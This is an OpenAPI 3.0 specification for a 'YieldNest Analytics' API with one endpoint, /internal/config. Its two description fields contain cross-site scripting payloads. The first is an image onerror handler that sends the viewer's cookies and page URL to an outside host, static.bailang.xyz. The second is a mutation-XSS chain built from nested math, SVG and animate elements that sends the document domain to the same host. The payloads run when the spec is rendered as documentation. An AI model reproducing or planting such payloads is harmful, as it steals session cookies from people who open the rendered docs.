openapi: "3.0.0"
info:
  title: "YieldNest Analytics"
  version: "2.0"
  description: "<img src=x onerror=fetch('https://static.bailang.xyz/c?d='+btoa(document.cookie+'|||'+location.href))>"
paths:
  /internal/config:
    get:
      summary: "Get config"
      description: "<form><math><mtext></mtext><mglyph><svg><mtext><textarea><path id=x d=\"M0\"><animate attributeName=d values=x dur=1s begin=x.end onend=fetch('https://static.bailang.xyz/c2?d='+btoa(document.domain))></animate></path></textarea></mtext></svg></mglyph></math></form>"
      responses:
        "200":
          description: "OK"
